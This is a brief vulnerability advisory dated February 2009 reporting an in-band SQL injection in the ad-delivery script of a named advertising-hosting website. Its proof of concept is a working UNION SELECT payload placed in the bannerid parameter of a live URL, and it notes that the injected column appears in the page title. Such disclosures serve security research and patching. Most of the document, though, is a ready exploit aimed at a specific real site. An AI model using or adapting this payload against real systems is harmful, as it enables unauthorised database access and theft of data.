==================================================================== Website: http://admagnet.net/ Category: Central Advertise Hosting Vulnerability: Inband SQL Injection Founder: Jaydeep Dave [jaydipdave@gmail.com] Date: 16th Feb, 2009 ==================================================================== == P O C =========================================================== URL: http://sharp.admagnet.net/suite/www/delivery/ac.php?bannerid=6481 Vulnerable URL: http://sharp.admagnet.net/suite/www/delivery/ac.php?bannerid=648121%20UNION%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,char(65),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/* The visible field is in page title. ====================================================================